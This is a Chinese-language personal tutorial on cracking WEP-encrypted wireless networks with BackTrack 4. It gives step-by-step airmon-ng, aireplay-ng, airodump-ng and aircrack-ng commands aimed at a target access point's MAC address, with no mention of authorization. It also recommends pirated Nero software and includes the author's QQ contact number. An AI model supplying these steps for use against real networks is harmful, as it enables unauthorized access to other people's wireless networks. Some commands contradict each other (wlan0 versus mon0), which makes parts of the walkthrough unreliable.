使用BT4破解无线网:(三条命令版)
1、下载镜像文件。
到 www.backtrack-linux.org下载BT4 ,我下的是 BT4-R1版的,目前来说是最新的。最好不要直接从直接点那个下载链接,感觉有点慢,先下那个种子就是点那个TORRENT(见图1)。下下来用迅雷下就好了,速度很快的。大概40分钟就好了。新版的使用的是ubuntu 8.10,使用起来还是蛮方便的。BT4现在支持多种的启动方式。在官网上有安装的方法,地址是: http://www.backtrack-linux.org/tutorials 讲解的还是蛮清楚的,具体可以自己看(图 2)。
再多说一句, BT4有VM版的,就是图1的第二个,可以装在VM虚拟机上的,但是由于我的网卡的原因,虚拟机一直识别不了无线网卡。Intel的5100确实是个悲剧。
图 1
图 2
2、刻录光盘。
下载完 BT4系统的镜像文件后就要刻录光盘。一般我喜欢用 U盘但是我用光盘启动的时候,总是启动不了系统,黑屏,不知道是什么原因,换了好几台机子都是这个情况,又是一个悲剧。我用的是nero9(绿盟软件下的,很好的一个下软件的网站,多数都是破解的),破解版的。抓下图(图3)喽。
图 3
做左边的那个一定要选 CD-ROM(ISO),其他的默认就好了。点击下面的打开,找到下载的镜像。
图 4
现在点刻录就好了(图 5),剩下的时间就是等待光盘刻录完成。一定要等光盘自己弹出来。
图 5
3、把刻录好的系统放进光驱。记得要更改系统的启动设置,使电脑从光驱启动。(因为无法截图所以下面有些图使用了网上一些朋友的,深表谢意)。然后等到系统加载到下图的界面(图6)。然后选择启动项,一般选第一个就好了,我当时是选的第5项。每个选项都应该差不多的。
图 6
4、然后系统开始加载配置,进入命令提示符,如果要求输入用户和密码,则用户名为root,密码为toor(好像cat和tac)。
图 7
图 7
5、输入第二个命令startx,进入图形化界面。这就是传说中伟大的Linux系统的xwindows了(图)。
图 8
图 9
图 10
6、点击下面任务栏里面黑框框,那就是linux下的terminal了(火狐右边的那个喽)。
现在三个命令才真正的开始喽。如果是5100的网卡的话,一定记得先运行下面这条命令,手动启动无线网卡:
Airmon-ng start wlan0 6
强烈建议每个人都先运行下这个命令,有备无患嘛。正如下图所示,第二栏后面一定要显示网卡才对的。既interface下面会有显示的一些网卡信息的。
图 11(这是我在VM里截的图,很明显现象是错的)
图 12 (这是网上的朋友的截图,正常的情况)
7 、运行命令ifconfig –a 查看有没有一个叫做 wlan0 的无线网卡的信息。
图 12

8、打开一个terminal输入第一条:aireplay-ng -9 wlan0回车(等待数据跳动停止)。这应该是一个注入的命令,以加快无线路由器的发包的速度。


9、输入airodump-ng --ivs -w <IVS_File> -c <Channel> mon0

这行命令是开始捕获IVS数据包,<IVS_File>是存放数据的文件名,随便起个名字就成,<Channel>这里指通道,写6就行。比如airodump-ng --ivs -w sjb -c 6 wlan0回车。该数据文件默认是在桌面上的仔细看下,可以发现的。如果是上面对命令的话则生成的文件名就是sjb-01.ivs

10、等待数据包data涨到5000以上,再打开一个Shell窗口,输入破解命令:

aircrack-ng   -n   64   -b   <ApMac>   <IVS_File>-01.ivs ,这里的<ApMac>是指目标AP的MAC地址,就是SSID号对应的MAC,只要数据包达到5000以上就可试试。<IVS_File>是就是上面保存数据的文件名。如果按照上面写的就是:

aircrack-ng -n 64 -b 00:11:22:33:44:55 sjb-01.ivs

00:11:22:33:44:55为要破解的AP的MAC地址,需要更改的。
等待 ,出现上面的出现就 Ok了。
笔者感言:
好长时间没有写过文档了,咋就感觉像是在写每学期的课程设计的实验报告一样。
其实中用的命令不过四条:
Airmon-ng start wlan0 6
aireplay-ng -9 wlan0

airodump-ng --ivs -w <IVS_File> -c <Channel> mon0

aircrack-ng   -n   64   -b   <ApMac>   <IVS_File>-01.ivs

但是我的废话好多,因为朋友,对这些不是很熟悉,所以大家见谅了。
BT4不只是一个破解无线的软件,更是一个网络管理方面不可或缺的一个系统,里面集成了很多的注入,扫描,破解,网络管理的软件。也可以说是一个装满了***工具的 linux系统。

BT4用来破解无线真的是大材小用了。上面的方法可以用很快的方法破解用wep加密技术加密无线网络。但是用wpa加密的确实不是很好。BT4中有专门的可以破解wpa加密的无线路由密码的软件。但是由于过程有点复杂,而且朋友没有用过linux,所以便没在写。有兴趣的 朋友可以自己到网上搜下资料。

皆因,本人能力有线,各中的种种错误还请大家赐教。本人不剩感激。
中间用到了一些朋友写的文章 ,特此感谢!
QQ: 793865071

                                                             ZHXRUI_WARRIOR